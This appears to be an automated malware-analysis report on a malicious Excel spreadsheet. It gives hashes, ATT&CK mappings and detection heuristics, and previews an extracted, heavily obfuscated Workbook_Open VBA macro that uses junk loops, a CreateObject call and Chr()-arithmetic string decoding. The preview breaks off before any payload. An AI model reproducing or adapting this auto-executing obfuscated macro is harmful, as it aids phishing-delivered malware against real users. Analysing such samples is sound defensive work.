Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1bbbe6b361084cdd…

MALICIOUS

Office (OLE)

Size: 57.0 KB
Created: 2018-09-13 00:50:06
Authoring application: Microsoft Excel
First seen: 2019-05-16
MD5: b279d2a01d5d056abd65a3455ba2dd01
SHA-1: 8a449403860b96baf5dcdf2d2c09d6e641043552
SHA-256: 1bbbe6b361084cdd0f88d69aa1ab51032debb22c37c442334e3d51dc56289854
Risk Score: 202

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The file is an Excel document containing a Workbook_Open VBA macro. This macro is heavily obfuscated and uses a CreateObject call, indicating it likely attempts to download and execute a second-stage payload. The presence of a Workbook_Open auto-execution event and obfuscated code strongly suggests a malicious intent, likely delivered via spearphishing.

Heuristics (6)

  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code.
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Workbook_Open macro [high] OLE_VBA_WBOPEN
    The document contains a Workbook_Open auto-execution macro.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    The macro code contains a CreateObject call.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13543 bytes
SHA-256: 88441f0e41b0bc9f29ba954cd8f4dd730f85e132d99bd1c818e1af3c100f7cea
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
teNuAhp3wr.cuBOTk_Bt_x2GWUYaWU3
While 24 = 55
Dim Im_cG_ISHbm As Boolean
Wend
Dim EgHaMKDt_VOkvvS As Worksheet
While 17 = 52
Dim s_dplcV5yt As Boolean
Wend
Dim hGSZt2QZ6ui As Worksheet
While 27 = 50
Dim N3KOSk2vWWqT As Boolean
Wend
Dim pZSnvAWslRpoC As Worksheet
While 13 = 56
Dim sRNc8Iy_scE As Boolean
Wend
Dim QZQ1cGaU1vm9ZM As Worksheet

While 6 = 41
Dim eYhB75LfKiRl As Boolean
Wend
Dim RYM1T67LUTrfNc As Worksheet
While 27 = 43
Dim SwOERxObsO8v As Boolean
Wend
Dim g3uMrhzyBG9ap As Worksheet
While 7 = 35
Dim BL1IqBvbD2r5c9x As Boolean
Wend
Dim B6cjUIXSjF As Worksheet
While 1 = 41
Dim XmxKxwYOjWRA As Boolean
Wend
Dim MJRc_BQNhBv_mW As Worksheet
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "teNuAhp3wr"
Dim bPBuSgeImr1N_C1HR9pyUOyYXaz6TFCBPnj9tMCCh_cUBw_Eg3PiG_gKakV1phyeox7Ya1XD5lOTvcWjZtXZzb4KEWgG1KV_J7oLyimocKmdxKY8LuY6IW As String
Dim xYzKUL1f1gTUrZmEH5RVQ4fW4SZg9UVql1KgCPv_WjDJFD3B_HYBiix4 As String
Dim oOj4XP4_MRumrAtK83cCTwxXa1k951pRXwU1z7711xI77M1rGfQWAjk1ZKagn4IUkaN5n2U_6kJfmzZM931WiQQwJdYmeXK7nwUe95CNJPaXYDLjuMguCuvRHZsIbqdfXM1zd5NCzlLRz3W As String
Dim hrM7nA8eHbXIFdfWGLWUq_XmhigqQUYwL4GXAUdudqIotAqRjCBwfS_hRiWDbPLvCk6LUGUvqkz9ys2g2MFNRkP23i_a8YRMdVkHDd7bpOE4bAr As Integer

 Function fm3PBqDWyNp3GCsLnmaVJz5SgxtXVzsgZr3lqFOSIwcMRGIJxxGZJA4pr(Pg6Nj9uS4S6EKIPlmg4AUj2NqP1lfFY_Idqnk_bVW5slXVS6UPKCYifooqfRGGvv355palAl_glY1NzT65PN5Uii8A84cHMNG6rbZlcsOh827E)
While 1 = 37
Dim jeVsn5Iy1WX1DL As Boolean
Wend
Dim jWUPExqzdjz15 As Worksheet
While 12 = 42
Dim YGoCzJS7RDpUZS As Boolean
Wend
Dim ggpTdCuMB_NLB9 As Worksheet
While 12 = 56
Dim tAu2v_tqKThosNQ As Boolean
Wend
Dim So5ndHQxOUw As Worksheet

 Dim Io6v_1ltcjQ_21sh2LWTOKG_Pdt5QHXQhjNXam_QjBjUjtFLe4KWfqN7f1djEpaSJ_eQlSEMGEsLkucfVfYW7At1UQ1iGdK4jPJjNxjJw7OZ7ATuW8LhOCVHNm6TbfEl4ykTj2
While 16 = 37
Dim IK_nwlHTKQQwhZ As Boolean
Wend
Dim izUTuxSe5qSSh As Worksheet
While 24 = 47
Dim gyaKef9yhk As Boolean
Wend
Dim ff6eWC_B2VL5R6 As Worksheet
While 7 = 50
Dim bcfcnOVTcCkes_u As Boolean
Wend
Dim OhkANyxxQ5 As Worksheet


   Dim WRjD4BrSkL3kFmQnIXhUDlVocKMKk_pKmzySUuz_RvgXf8UCZW9cjgat54iqweqjep8Pw7RWggCP_8GdzJuM_Lk_XDXZJHLvD63z__NbDj5Bd
While 3 = 55
Dim b4oa6TkferA9 As Boolean
Wend
Dim eJQMKC342R4Okwk As Worksheet
While 21 = 49
Dim DEnnMgKUq2fq9 As Boolean
Wend
Dim MVsPCYr_mt As Worksheet
While 7 = 49
Dim WCH9XzHsqbYC As Boolean
Wend
Dim Vt796fReJ53_ As Worksheet
   
While 5 = 31
Dim gfSsJJCa3rzdBUQ As Boolean
Wend
Dim BW8PewRVe_ZvcTN As Worksheet
While 4 = 37
Dim tbHDa2eXhfX As Boolean
Wend
Dim Hm4b6jMPFKmVPN As Worksheet
While 18 = 48
Dim HxnsWiFn8W As Boolean
Wend
Dim T73Xe9YtFzHsjk As Worksheet
 Set WRjD4BrSkL3kFmQnIXhUDlVocKMKk_pKmzySUuz_RvgXf8UCZW9cjgat54iqweqjep8Pw7RWggCP_8GdzJuM_Lk_XDXZJHLvD63z__NbDj5Bd = CreateObject(xYzKUL1f1gTUrZmEH5RVQ4fW4SZg9UVql1KgCPv_WjDJFD3B_HYBiix4)
While 27 = 55
Dim cKNCFhxuwLsptx As Boolean
Wend
Dim GxydnfF9pxtGv3 As Worksheet
While 26 = 59
Dim OY_XLBNKTDfY As Boolean
Wend
Dim hiHpoyNjkQAn As Worksheet
While 12 = 49
Dim DDddeYQ9u5eW As Boolean
Wend
Dim FSbqi6ct8N7gy As Worksheet
   bPBuSgeImr1N_C1HR9pyUOyYXaz6TFCBPnj9tMCCh_cUBw_Eg3PiG_gKakV1phyeox7Ya1XD5lOTvcWjZtXZzb4KEWgG1KV_J7oLyimocKmdxKY8LuY6IW = Chr(369 - 271) & Chr(295 - 190) & Chr(307 - 197) & Chr(246 - 200) & Chr(452 - 354) & Chr(404 - 307) & Chr(424 - 309) & Chr(261 - 160) & Chr(73 - 19) & Chr(179 - 127)
While 1 = 59
Dim G53KP7XZTGgto4u As Boolean
Wend
Dim fmmDuhUUf_o
... (truncated)